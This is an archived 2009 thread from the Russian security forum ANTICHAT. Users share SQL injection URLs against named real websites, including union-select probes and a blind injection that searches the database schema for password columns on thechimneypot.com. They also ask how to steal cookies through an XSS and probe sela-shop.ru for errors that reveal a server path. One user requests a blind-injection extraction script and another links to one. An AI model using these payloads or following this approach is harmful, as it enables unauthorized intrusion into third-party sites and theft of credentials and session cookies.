ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.06.2009, 10:25
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.thechimneypot.com/newsletter.php?id=11+order+by+5--
http://www.thechimneypot.com/newsletter.php?id=-1+union+select+1,2,3,4,5
Union'ом подобрал до 50 - без результатов. |
|
|
02.06.2009, 11:20
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.thechimneypot.com/newsletter.php?id=11+and+1=if(ascii(substring((sel ect+table_name+from+information_schema.columns+whe re+column_name+like+0x257061737325+limit+0,1),1,1) )>1,1,2)--+
Либо рядом
http://www.thechimneypot.com/gallery.php?category_id=17&hall_of_fame=&project_i d=-336+union+select+1,2,3,4,table_name,6+from+informa tion_schema.columns+where+column_name+like+0x25706 1737325--+
|
|
|
|
02.06.2009, 17:32
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Есть сайт site.ru на этом сайте есть XSS-уязвимость. Есть субдомен - forum.site.ru, с него необходимо стырить куки. Можно?
|
|
|
|
02.06.2009, 17:34
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Походу,тут решает переменная path в session_id,если не ошибаюсь() ).Если path=/,то куки доступны всему домену)
|
|
|
|
02.06.2009, 17:40
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
2mailbrush
Возможность есть только если в куках прописано чтото типа domain:.site.ru
А так никак, так как поддомен это уже совершенно ДРУГОЙ сайт и куки там устанавливаются ДРУГИЕ
|
|
|
|
02.06.2009, 17:50
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Да, я это знаю, насчет поддоменов, просто встречались такие XSS-ки, которые работали на субдоменах.
Возможность есть только если в куках прописано чтото типа domain:.site.ru
Вот, именно это я и хотел узнать. Такого нету... Теперь смысл понятен. |
|
|
|
02.06.2009, 20:11
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме:
800727
Репутация:
83
|
|
а чем это может меня порадовать и какие выводы можно из этого сделать?
http://www.sela-shop.ru/clothes.aspx?cat=93&scat=14'
|
|
|
|
02.06.2009, 20:43
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
думаю только раскрытие путей
Source File: c:\Inetpub\wwwroot\sela-shop.ru\App_Code\PublicItems.cs Line: 1565
|
|
|
|
02.06.2009, 21:17
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310
Репутация:
7
|
|
Есть где нибудь (поиск не помог) программка или скрипт для выдирания данных через blind иньекцию. Не слишком замороченная, просто что бы делила АСКИ диапазон пополам, потом ещё раз пополам итд... вобщем чтобы минимизировала число запросов?
|
|
|
|
03.06.2009, 09:20
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218
Репутация:
59
|
|
2farpost, вот держи:
https://forum.antichat.ru/showpost.php?p=894169&postcount=5
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
